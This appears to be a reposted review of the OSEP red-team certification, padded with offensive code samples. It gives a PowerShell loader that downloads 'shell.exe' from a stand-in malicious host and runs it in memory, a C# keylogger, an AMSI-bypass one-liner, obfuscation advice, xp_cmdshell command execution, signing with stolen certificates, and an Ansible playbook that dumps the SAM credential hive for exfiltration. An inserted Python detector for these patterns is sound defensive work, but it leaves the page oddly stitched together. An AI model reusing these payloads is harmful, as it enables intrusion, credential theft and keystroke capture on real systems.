The OffSec Experienced Penetration Tester (OSEP) certification is an advanced course designed for cybersecurity professionals aiming to enhance their red teaming and penetration testing skills. With 700-800 hours of content, it significantly expands on the OSCP’s 400-hour curriculum, emphasizing programming, malware development, and advanced evasion techniques.
### **Course Highlights:**
- Programming Skills: Writing basic malware in PowerShell and C#, including WinAPI interaction.
- Antivirus Evasion: Techniques to bypass AV (though some methods are outdated, they provide foundational knowledge).
- MS SQL Server Exploitation: Advanced attacks on databases.
- DevOps Tools: Practical usage of Ansible for automation in red teaming.
- Active Directory (AD): While not groundbreaking for experienced testers, it reinforces AD attack methodologies.
### **You Should Know:**
#### **1. PowerShell Malware Development**
PowerShell remains a powerful tool for red teamers. Below is a basic script to execute payloads in memory (avoiding disk writes):
```powershell
# Reflective PE Injection (in-memory execution)
$bytes = (Invoke-WebRequest "http://malicious.site/shell.exe").Content;
$assembly = [System.Reflection.Assembly]::Load($bytes);
$entry = $assembly.EntryPoint;
$entry.Invoke($null, $null);
```
**Evasion Tip:** Obfuscate using **Invoke-Obfuscation**:
```powershell
Invoke-Obfuscation -ScriptBlock { Start-Process notepad.exe } -TokenAll -Quiet
```
#### **2. C# Malware with WinAPI**
A simple **keylogger** using WinAPI:
```csharp
using System;
using System.Runtime.InteropServices;
using System.Diagnostics;

class Keylogger {
    [DllImport("user32.dll")]
    public static extern int GetAsyncKeyState(int i);

    static void Main() {
        while (true) {
            for (int i = 8; i < 190; i++) {
                if (GetAsyncKeyState(i) == -32767)
                    Console.WriteLine((char)i);
            }
        }
    }
}
```
Compile with:
```
csc /target:exe Keylogger.cs
```
#### **3. AV Evasion Techniques**
- Code Signing: Use stolen or self-signed certificates.
- Process Hollowing: Replace legitimate process memory with malicious code.
- AMSI Bypass: Disable AMSI scanning in PowerShell:
```powershell
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```
#### **4. MS SQL Server Attacks**
- Command Execution via xp_cmdshell:
```sql
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';
```
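As an added, defender-side example (not from the original post or the OSEP course material), the following Python scans constructed PowerShell script block log entries and SQL Server audit statements for the AMSI-tampering, reflective assembly load and xp_cmdshell patterns shown in sections 3 and 4; the event layout, log source labels and rule names are assumptions.

```python
import re

# Constructed sample telemetry (not from the original post): PowerShell
# script block log entries (Event ID 4104 style) and SQL Server audit
# statements, each as a dict with an id, a source label and the captured text.
SAMPLE_EVENTS = [
    {"id": 1, "source": "PowerShell/4104",
     "text": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
             ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"},
    {"id": 2, "source": "PowerShell/4104",
     "text": "$a = [System.Reflection.Assembly]::Load($bytes); $a.EntryPoint.Invoke($null,$null)"},
    {"id": 3, "source": "MSSQL/audit",
     "text": "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"},
    {"id": 4, "source": "MSSQL/audit",
     "text": "SELECT name FROM sys.databases;"},
    {"id": 5, "source": "PowerShell/4104",
     "text": "Get-ChildItem C:\\Users | Sort-Object Name"},
]

# Each rule: a name, the log source it applies to, and a case-insensitive
# regex for the string the corresponding snippet on this page depends on.
RULES = [
    ("amsi_tamper", "PowerShell/4104",
     re.compile(r"AmsiUtils|amsiInitFailed", re.IGNORECASE)),
    ("reflective_assembly_load", "PowerShell/4104",
     re.compile(r"Reflection\.Assembly\]::Load\s*\(", re.IGNORECASE)),
    ("xp_cmdshell_enabled", "MSSQL/audit",
     re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1\b", re.IGNORECASE)),
    ("xp_cmdshell_exec", "MSSQL/audit",
     re.compile(r"\bxp_cmdshell\s+'", re.IGNORECASE)),
]


def scan_events(events):
    """Return {event_id: [rule names]} for every event that matches a rule."""
    findings = {}
    for event in events:
        hits = [name for name, source, pattern in RULES
                if event["source"] == source and pattern.search(event["text"])]
        if hits:
            findings[event["id"]] = hits
    return findings


if __name__ == "__main__":
    for event_id, hits in scan_events(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(hits)}")
```

String rules like these are exactly what the obfuscation tip in section 1 is meant to defeat, so treat them as one signal and also audit the server's actual state (the `xp_cmdshell` row in `sys.configurations`) rather than relying on log text alone.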
#### **5. Ansible for Red Teaming**
Automate post-exploitation tasks:
```yaml
- hosts: compromised_servers
  tasks:
    - name: Dump SAM
      win_command: reg save HKLM\SAM C:\SAM
    - name: Exfiltrate
      win_command: certutil -encode C:\SAM C:\SAM.b64
```
### **What Undercode Say:**
The OSEP certification is a must for red teamers, especially those diving into malware development and evasion. While some techniques are dated, the course provides a solid foundation for bypassing modern defenses. Key takeaways:
- Master PowerShell & C# for offensive tooling.
- Understand WinAPI for low-level attacks.
- Leverage DevOps tools like Ansible for automation.
- Always test AV evasion in real environments.
For further study, check:
Reported By: Activity 7310027936365998080 – Hackers Feeds